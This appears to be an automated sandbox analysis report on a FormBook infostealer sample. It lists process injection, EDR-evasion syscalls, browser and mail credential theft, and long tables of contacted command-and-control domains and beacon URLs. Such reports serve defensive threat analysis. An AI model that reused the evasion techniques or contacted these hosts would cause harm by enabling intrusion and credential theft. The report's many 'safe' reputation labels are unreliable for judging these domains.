        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync113
        System Information Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1513892 Sample: ncOLm62YLB.exe Startdate: 19/09/2024 Architecture: WINDOWS Score: 100 39 Suricata IDS alerts for network traffic 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Antivirus detection for URL or domain 2->43 45 5 other signatures 2->45 9 ncOLm62YLB.exe 1 2->9         started        process3 signatures4 59 Writes to foreign memory regions 9->59 61 Maps a DLL or memory area into another process 9->61 63 Switches to a custom stack to bypass stack traces 9->63 12 svchost.exe 9->12         started        process5 signatures6 65 Maps a DLL or memory area into another process 12->65 15 dGGVPduKBhByY.exe 12->15 injected process7 signatures8 67 Maps a DLL or memory area into another process 15->67 69 Found direct / indirect Syscall (likely to bypass EDR) 15->69 18 taskkill.exe 1 20 15->18         started        process9 dnsIp10 31 www.sqlite.org 45.33.6.223, 49162, 80 LINODE-APLinodeLLCUS United States 18->31 29 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 18->29 dropped 47 Tries to steal Mail credentials (via file / registry access) 18->47 49 Tries to harvest and steal browser information (history, passwords, etc) 18->49 51 Maps a DLL or memory area into another process 18->51 53 Queues an APC in another process (thread injection) 18->53 23 dGGVPduKBhByY.exe 18->23 injected 27 firefox.exe 18->27         started        file11 signatures12 process13 dnsIp14 33 www.uburn.xyz 23->33 35 www.moritynomxd.xyz 23->35 37 20 other IPs or domains 23->37 55 Found direct / indirect Syscall (likely to bypass EDR) 23->55 signatures15 57 Performs DNS queries to domains with low reputation 35->57

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        ncOLm62YLB.exe55%ReversingLabsWin32.Backdoor.FormBook
        ncOLm62YLB.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\sqlite3.dll0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
        https://duckduckgo.com/ac/?q=0%URL Reputationsafe
        http://www.sqlite.org/copyright.html.0%URL Reputationsafe
        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
        https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
        https://www.reg.ru/web-sites/website-builder/?utm_source=www.albero-dveri.online&utm_medium=parking&0%Avira URL Cloudsafe
        http://www.palcoconnector.net/px.js?ch=20%Avira URL Cloudsafe
        https://reg.ru0%Avira URL Cloudsafe
        http://www.palcoconnector.net/__media__/js/trademark.php?d=palcoconnector.net&type=ns0%Avira URL Cloudsafe
        http://www.palcoconnector.net/px.js?ch=10%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot0%Avira URL Cloudsafe
        https://dts.gnpge.com0%Avira URL Cloudsafe
        https://cdn.consentmanager.net0%Avira URL Cloudsafe
        https://www.tmstore.click/pk64/?8Xv=VLHph&00yp=D2L0%Avira URL Cloudsafe
        https://www.reg.ru/whois/?check=&dname=www.albero-dveri.online&amp;reg_source=parking_auto0%Avira URL Cloudsafe
        http://www.albero-dveri.online/vyk8/0%Avira URL Cloudsafe
        http://www.palcoconnector.net/Cable_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAOGcy0%Avira URL Cloudsafe
        https://www.reg.ru/web-sites/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf0%Avira URL Cloudsafe
        http://www.glintra.cyou/eaxv/0%Avira URL Cloudsafe
        http://www.palcoconnector.net/Pal_TV.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAOGcyv6riP8JaBO0%Avira URL Cloudsafe
        http://www.palcoconnector.net/RCA_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAOGcyv60%Avira URL Cloudsafe
        http://www.les-massage.online/qqaq/0%Avira URL Cloudsafe
        http://www.palcoconnector.net/c45k/?00yp=08ptcl9k6k3Clc+jjeiigEOOLHF28gEUYr4PirX9ycnlRkqnpIEJw02nTPpiHhV7v0qw4/F1nlB53J+WXC6t4B6EHZ9Land6YOYaCIbjR0qGfJ/yxxEwKy76YPu4&8Xv=VLHph0%Avira URL Cloudsafe
        http://www.sppsuperplast.online/og3c/?00yp=PJMN73v+cS+JEOCp4N2ca7oXQDrHb//8AP5dNED26sKmApKDXWDq3GmViPe/3Gp4IvoVz7hFkPBhwTiSMYvo23y1UkhRtLoj8dNpbmj0FYqu8O4HVfsyiW8+Yu10&8Xv=VLHph0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/pics/29590/bg1.png)0%Avira URL Cloudsafe
        http://www.wdeb18.top/66vh/?00yp=kbtx4jUoEeJqru/eYT3c5Vhire4uK17S+715NBpuIdmHZ1xIlp9jjMC+TZBsTM0SMZjf/6T4SKfDIcfbQgeQOxE4AwPYeLb9hxh0awV4oFygVNkIao1fnT6jcB2l&8Xv=VLHph0%Avira URL Cloudsafe
        https://parking.reg.ru/script/get_domain_data?domain_name=www.albero-dveri.online&rand=0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf0%Avira URL Cloudsafe
        https://www.reg.ru/dedicated/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_la0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff20%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg0%Avira URL Cloudsafe
        https://www.reg.ru/whois/?check=&dname=www.les-massage.online&amp;reg_source=parking_auto0%Avira URL Cloudsafe
        http://www.moritynomxd.xyz0%Avira URL Cloudsafe
        http://www.palcoconnector.net/__media__/design/underconstructionnotice.php?d=palcoconnector.net0%Avira URL Cloudsafe
        http://www.sppsuperplast.online/og3c/0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/pics/28903/search.png)0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)0%Avira URL Cloudsafe
        https://www.reg.ru/dedicated/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l0%Avira URL Cloudsafe
        https://delivery.consentmanager.net0%Avira URL Cloudsafe
        http://www.palcoconnector.net/c45k/0%Avira URL Cloudsafe
        http://www.sqlite.org/2018/sqlite-dll-win32-x86-3230000.zip0%Avira URL Cloudsafe
        https://www.reg.ru/domain/new/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix0%Avira URL Cloudsafe
        https://www.reg.ru/web-sites/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_la0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot0%Avira URL Cloudsafe
        http://www.wdeb18.top/66vh/0%Avira URL Cloudsafe
        http://www.palcoconnector.net/display.cfm0%Avira URL Cloudsafe
        https://parking.reg.ru/script/get_domain_data?domain_name=www.les-massage.online&rand=0%Avira URL Cloudsafe
        http://www.2bhp.com/znmp/?00yp=FLkVAxn7xj4ld/LvMq0K/iiXulx9N79aE0AH2N1ZkKvu5bquFbdTzPdTC48MhLLFLmYJ1R3iNuIMDMPSAaDXGLZVeUFEAGqcz1H7kSUUuWNlK+WvQ97ihpKrgIN8&8Xv=VLHph0%Avira URL Cloudsafe
        http://www.glintra.cyou/eaxv/?00yp=bH1YG+zUiphgWlE6z5XKm1634D4xd3mXx7VGnNY2K0RSGQ9xBXqow0pPHKhWVXfXj/YC8GTm7XZkAlB3qbMa7XLrOSxMydPR+Fuoje1qC1dI5FzP/s9gH3iBDNgT&8Xv=VLHph0%Avira URL Cloudsafe
        http://www.tempatmudisini01.click/lybf/100%Avira URL Cloudmalware
        http://www.moritynomxd.xyz/1tk5/?00yp=Q0CjUHI68ZrfxR5aH7yI0BUJRaW1qetdZOL/CvAk0p6VOu6F8J4bRF77+lLddJtqRvjzBHuHK195sHOnP/TIC5IkHUm3lhR0HPdJF2NbuGauEJoIrdtAli4Deo9a&8Xv=VLHph0%Avira URL Cloudsafe
        http://www.uburn.xyz/unks/0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf0%Avira URL Cloudsafe
        https://www.reg.ru/hosting/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lan0%Avira URL Cloudsafe
        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search0%Avira URL Cloudsafe
        https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-0%Avira URL Cloudsafe
        https://www.google.com/favicon.ico0%Avira URL Cloudsafe
        http://www.palcoconnector.net/Wire_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAOGcyv0%Avira URL Cloudsafe
        http://www.Palcoconnector.net0%Avira URL Cloudsafe
        https://www.reg.ru/domain/new/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_l0%Avira URL Cloudsafe
        http://www.palcoconnector.net/Ntsc_Pal_Adapter.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAOGcy0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg0%Avira URL Cloudsafe
        http://www.2bhp.com/znmp/0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix0%Avira URL Cloudsafe
        http://www.les-massage.online/qqaq/?00yp=1v32F+fVawNhWDDVdYvfWdZqxCtuvDWQ4k7tvYXEY8SwEi5Vtj7kNwCwXS/xItGDjN76wG9CW8ocseRH+7QWGn4T5K3waEEqSMTX9Es49Y6frrF6sB7z9p7VlQAX&8Xv=VLHph0%Avira URL Cloudsafe
        http://www.palcoconnector.net/sk-logabpstatus.php?a=OGRiNXNPSDlMUGVYb1ZTS0xtY0NMZjU0Q29NQTZaT29TSnk00%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff20%Avira URL Cloudsafe
        https://www.reg.ru/web-sites/website-builder/?utm_source=www.les-massage.online&utm_medium=parking&u0%Avira URL Cloudsafe
        http://www.030003302.xyz/vkua/?00yp=H4X0iIfcuDR/51hvqrfWv+fBB4gw1DJH+OHHMfulTPpinGKmiwvV0bR+rgtd9UluzvoyGSPCeaIsA9B2OO6wneeytNJ9oAaYwF4aKTQt7TjjQdxEyAl8xbFhx+zF&8Xv=VLHph0%Avira URL Cloudsafe
        http://www.albero-dveri.online/vyk8/?00yp=/8W9lHmy/meYp2fNs2vUBdBvO0RaxjuKL4zSfhQhCqnq6Zc+yf7IonRJTCfzY86I2zYWDYBqoARqKVl9Xke+POkkhC0Ee73KmYZXYdkjDu+t7uIGKB6Jrfbo3k9d&8Xv=VLHph0%Avira URL Cloudsafe
        http://www.030003302.xyz/vkua/0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/js/min.js?v2.30%Avira URL Cloudsafe
        https://www.reg.ru/hosting/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_land0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff0%Avira URL Cloudsafe
        http://www.moritynomxd.xyz/1tk5/0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold0%Avira URL Cloudsafe
        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe

        Download Network PCAP: filteredfull

        NameIPActiveMaliciousAntivirus DetectionReputation
        www.palcoconnector.net
        208.91.197.27
        truetrue
          unknown
          www.albero-dveri.online
          194.58.112.174
          truetrue
            unknown
            www.uburn.xyz
            67.223.117.189
            truetrue
              unknown
              www.2bhp.com
              81.88.63.46
              truetrue
                unknown
                www.moritynomxd.xyz
                172.81.61.224
                truetrue
                  unknown
                  natroredirect.natrocdn.com
                  85.159.66.93
                  truetrue
                    unknown
                    tempatmudisini01.click
                    103.21.221.4
                    truetrue
                      unknown
                      030003302.xyz
                      65.21.196.90
                      truetrue
                        unknown
                        dns.ladipage.com
                        54.179.173.60
                        truetrue
                          unknown
                          glintra.cyou
                          84.32.84.32
                          truetrue
                            unknown
                            wdeb18.top
                            206.119.82.147
                            truetrue
                              unknown
                              www.sqlite.org
                              45.33.6.223
                              truefalse
                                unknown
                                www.les-massage.online
                                194.58.112.174
                                truetrue
                                  unknown
                                  www.wdeb18.top
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.tmstore.click
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.030003302.xyz
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.glintra.cyou
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.trapkitten.website
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.tempatmudisini01.click
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.sppsuperplast.online
                                              unknown
                                              unknowntrue
                                                unknown
                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.albero-dveri.online/vyk8/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.palcoconnector.net/c45k/?00yp=08ptcl9k6k3Clc+jjeiigEOOLHF28gEUYr4PirX9ycnlRkqnpIEJw02nTPpiHhV7v0qw4/F1nlB53J+WXC6t4B6EHZ9Land6YOYaCIbjR0qGfJ/yxxEwKy76YPu4&8Xv=VLHphtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.glintra.cyou/eaxv/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.les-massage.online/qqaq/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.sppsuperplast.online/og3c/?00yp=PJMN73v+cS+JEOCp4N2ca7oXQDrHb//8AP5dNED26sKmApKDXWDq3GmViPe/3Gp4IvoVz7hFkPBhwTiSMYvo23y1UkhRtLoj8dNpbmj0FYqu8O4HVfsyiW8+Yu10&8Xv=VLHphtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.wdeb18.top/66vh/?00yp=kbtx4jUoEeJqru/eYT3c5Vhire4uK17S+715NBpuIdmHZ1xIlp9jjMC+TZBsTM0SMZjf/6T4SKfDIcfbQgeQOxE4AwPYeLb9hxh0awV4oFygVNkIao1fnT6jcB2l&8Xv=VLHphtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.sppsuperplast.online/og3c/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.palcoconnector.net/c45k/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.sqlite.org/2018/sqlite-dll-win32-x86-3230000.zipfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.wdeb18.top/66vh/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.2bhp.com/znmp/?00yp=FLkVAxn7xj4ld/LvMq0K/iiXulx9N79aE0AH2N1ZkKvu5bquFbdTzPdTC48MhLLFLmYJ1R3iNuIMDMPSAaDXGLZVeUFEAGqcz1H7kSUUuWNlK+WvQ97ihpKrgIN8&8Xv=VLHphtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.tempatmudisini01.click/lybf/true
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.glintra.cyou/eaxv/?00yp=bH1YG+zUiphgWlE6z5XKm1634D4xd3mXx7VGnNY2K0RSGQ9xBXqow0pPHKhWVXfXj/YC8GTm7XZkAlB3qbMa7XLrOSxMydPR+Fuoje1qC1dI5FzP/s9gH3iBDNgT&8Xv=VLHphtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.moritynomxd.xyz/1tk5/?00yp=Q0CjUHI68ZrfxR5aH7yI0BUJRaW1qetdZOL/CvAk0p6VOu6F8J4bRF77+lLddJtqRvjzBHuHK195sHOnP/TIC5IkHUm3lhR0HPdJF2NbuGauEJoIrdtAli4Deo9a&8Xv=VLHphtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.uburn.xyz/unks/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.2bhp.com/znmp/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.les-massage.online/qqaq/?00yp=1v32F+fVawNhWDDVdYvfWdZqxCtuvDWQ4k7tvYXEY8SwEi5Vtj7kNwCwXS/xItGDjN76wG9CW8ocseRH+7QWGn4T5K3waEEqSMTX9Es49Y6frrF6sB7z9p7VlQAX&8Xv=VLHphtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.030003302.xyz/vkua/?00yp=H4X0iIfcuDR/51hvqrfWv+fBB4gw1DJH+OHHMfulTPpinGKmiwvV0bR+rgtd9UluzvoyGSPCeaIsA9B2OO6wneeytNJ9oAaYwF4aKTQt7TjjQdxEyAl8xbFhx+zF&8Xv=VLHphtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.albero-dveri.online/vyk8/?00yp=/8W9lHmy/meYp2fNs2vUBdBvO0RaxjuKL4zSfhQhCqnq6Zc+yf7IonRJTCfzY86I2zYWDYBqoARqKVl9Xke+POkkhC0Ee73KmYZXYdkjDu+t7uIGKB6Jrfbo3k9d&8Xv=VLHphtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.030003302.xyz/vkua/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.moritynomxd.xyz/1tk5/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://www.palcoconnector.net/px.js?ch=2taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.palcoconnector.net/px.js?ch=1taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://duckduckgo.com/chrome_newtabtaskkill.exe, 00000004.00000003.482456239.0000000005DAF000.00000004.00000020.00020000.00000000.sdmp, 21E1tK1Ol.4.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://www.reg.ru/whois/?check=&dname=www.albero-dveri.online&amp;reg_source=parking_autotaskkill.exe, 00000004.00000002.881943022.00000000038F2000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003E52000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.reg.ru/web-sites/website-builder/?utm_source=www.albero-dveri.online&utm_medium=parking&taskkill.exe, 00000004.00000002.881943022.00000000038F2000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003E52000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://dts.gnpge.comdGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://duckduckgo.com/ac/?q=taskkill.exe, 00000004.00000003.482456239.0000000005DAF000.00000004.00000020.00020000.00000000.sdmp, 21E1tK1Ol.4.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://reg.rutaskkill.exe, 00000004.00000002.881943022.00000000038F2000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.881943022.0000000003DA8000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000004308000.00000004.00000001.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003E52000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eottaskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.palcoconnector.net/__media__/js/trademark.php?d=palcoconnector.net&type=nstaskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://cdn.consentmanager.nettaskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.tmstore.click/pk64/?8Xv=VLHph&00yp=D2Ltaskkill.exe, 00000004.00000002.881943022.0000000002DF4000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003354000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.495203034.00000000013B4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otftaskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.palcoconnector.net/RCA_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAOGcyv6taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.palcoconnector.net/Pal_TV.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAOGcyv6riP8JaBOtaskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.palcoconnector.net/Cable_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAOGcytaskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.reg.ru/web-sites/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_ltaskkill.exe, 00000004.00000002.881943022.00000000038F2000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003E52000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://i4.cdn-image.com/__media__/pics/29590/bg1.png)taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://parking.reg.ru/script/get_domain_data?domain_name=www.albero-dveri.online&rand=taskkill.exe, 00000004.00000002.881943022.00000000038F2000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003E52000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otftaskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgtaskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.reg.ru/dedicated/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_lataskkill.exe, 00000004.00000002.881943022.0000000003DA8000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000004308000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.palcoconnector.net/__media__/design/underconstructionnotice.php?d=palcoconnector.nettaskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.reg.ru/whois/?check=&dname=www.les-massage.online&amp;reg_source=parking_autotaskkill.exe, 00000004.00000002.881943022.0000000003DA8000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000004308000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.moritynomxd.xyzdGGVPduKBhByY.exe, 00000005.00000002.881610110.0000000000ABE000.00000040.80000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://i4.cdn-image.com/__media__/pics/28903/search.png)taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)taskkill.exe, 00000004.00000002.881943022.00000000035CE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000004.00000002.882295376.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
